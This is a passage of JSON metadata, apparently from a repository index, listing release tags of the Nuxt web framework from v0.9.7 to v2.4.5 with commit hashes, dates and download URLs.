d2cae232d807ba0dd100b8f3f7bbb010","kind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e1163a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_u